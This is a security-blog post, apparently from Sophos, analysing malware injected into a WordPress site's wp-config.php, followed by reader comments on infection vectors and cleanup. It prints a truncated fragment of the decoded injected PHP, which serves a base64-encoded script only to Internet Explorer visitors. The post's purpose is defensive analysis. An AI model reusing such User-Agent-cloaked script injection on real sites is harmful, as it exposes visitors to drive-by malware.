Troj/PHPShll-B: Malware injects itself into WordPress installations

Filed Under: Featured, Malware

On Friday, a colleague in our IT department asked about a Mal/Badsrc-C malware detection that had been found by Sophos products on one of their friend's websites.

When I initially downloaded the website it looked clean. However, the automated systems inside SophosLabs were detecting the webpage as being infected with Mal/Badsrc-C.

So, I investigated a little more deeply - repeating the download after setting the User-Agent in my browser to pretend to be Internet Explorer.

This time I saw:

>>> Virus 'Mal/Badsrc-C' found in file index.html

Clearly, the malware on the website was planted in such a way that it would only manifest itself if it believed that the computer visiting the webpage was running Internet Explorer.

When you look at the last line of the index.html file you can see the appended malicious script tag:

Appended malicious script tag

As my colleague knew the affected website's owner, I was able to gain a complete copy of the site which was running an installation of the popular WordPress blogging platform.

Looking at the WordPress configuration file (wp-config.php) I saw a suspicious piece of code prepended:

When this code is run it decodes to some suspicious code:

stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){ return base64_decode("PHNjcmlwdCBzcm...

The above code snippet means that malicious code will only be served if the User-Agent is Internet Explorer. The geekier amongst you will recognise the base64 string as being the beginning of:

<script src

Sophos now detects and disinfects this modified code as Troj/PHPShll-B.

So, what's happened is that somehow malicious code has managed to inject itself into the PHP code used on some websites running WordPress, meaning that if you visit them when running Internet Explorer you could be exposing yourself to a malware attack.

What isn't clear is exactly how the malicious code managed to embed itself on the website, although it was most probably via compromised FTP credentials.

If you run a site which uses WordPress you would be wise to ensure that your passwords are chosen carefully (not dictionary words, and not easy to guess) and that you are not using the same credentials on any other websites. If you think it's possible that your password details may have been stolen - or if you use the same passwords elsewhere on the internet - change them immediately.

Furthermore, you should be regularly auditing the code on your site to ensure that there have not been any unauthorised changes.

Finally, always ensure that your website software is up-to-date and fully patched.

This hack appears to be widespread and website owners need to be vigilant.

, , ,

You might like

9 Responses to Troj/PHPShll-B: Malware injects itself into WordPress installations

  1. James · 1481 days ago

    WordPress. If your not ready to run your own install ultra professionally, go with or Blogger.


  2. Rick H · 1481 days ago

    If you think that your installation is corrupted, you can do a reinstall of the latest version from the WP Admin Dashboard. I believe that will fix the wp-config.php .

    Then make sure that your 'admin' account is not called 'admin'. Make a new user, set it as admin level with a strong password, login as that new account, then delete (or demote) the account called 'admin'.

    A reinstall will also fix the TomThumb plugin problem that allowed malicious code to infect the wp-config and wp-settings files.

    • Phil · 1480 days ago

      Thanks, Rick. I appreciate that you offered such a specific fix.

    • This doesn't seem to be a TimThumb exploit (I assume you meant Tim not Tom) but good advice.

    • A re-install from the dashboard will *not* change the wp-config.php file. So be sure to check that yourself.

      • CypherHackz · 1479 days ago

        Agree with Otto. Re-install WordPress will not replace the wp-config.php file.

  3. unquietvisions · 1480 days ago

    I dealt with a variant of this sort of thing last year. A snippet of code was injected into every index.php on my server, as well as index.html files. It was base 64, embedded as an inline frame. This happened to wordpress, and was also in Menalto's Gallery, and any other index file on my server. It hit ALL the domains I hosted. If I edited it out of a page, saved, then went to the next file, by the time I got rid of that code, it reinfected the page I just cleaned. It took weeks to get things cleaned up, It was a nightmare for a webmaster to deal with.

  4. Phil · 1480 days ago

    I run several small WordPress sites (none are for profit) on Network Solutions and 1&1 shared hosting. Can you recommend a scanning service that I can use to ensure my websites are secure?


  5. Most common methods of injection of malware on a WP website. I have seen all of these.

    1. TimThumb. Most popular method at the moment.

    2. Shared hosting account with bad cross-user permissions. Basically somebody gets in on a different website on the same server, puts an auto-hack script on there, script runs occasionally and searches out vulnerable files on the server, then appends its own code. Very, very common. Auto-injection scripts have gotten much smarter too, and can tell what kind of site they're injecting into and adapt accordingly. All injection scripts know about WP and will perform specific hacks for it when they can.

    3. Vulnerable plugin. Most scanning tools out in the wild nowadays run hack attempts on a wide variety of vulnerabilities, and plugin vulnerabilities are no exception. Always update your plugins. Always use well-supported plugins.

    4. FTP credentials theft. This is a surprising one but it still happens. You run some kind of malware, it finds your FTP credentials stored on the PC, uploads them somewhere, and you get malware auto uploaded to your site. This once bit me, in fact. Solution: Don't use FTP, use a more secure method. Don't save the password in programs like FileZilla either, just type the password in every time.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Paul O Baccas (aka pob) joined Sophos in 1997 after studying Engineering Science at Oxford University. After nearly 16 years, he has left Sophos to pastures new and will be writing as an independent malware researcher. Paul has: published several papers, presented at several Virus Bulletins and was a technical editor for "AVIEN Malware Defense Guide". He has contributed to Virus Bulletin and is a frequent contributor to the NakedSecurity blog.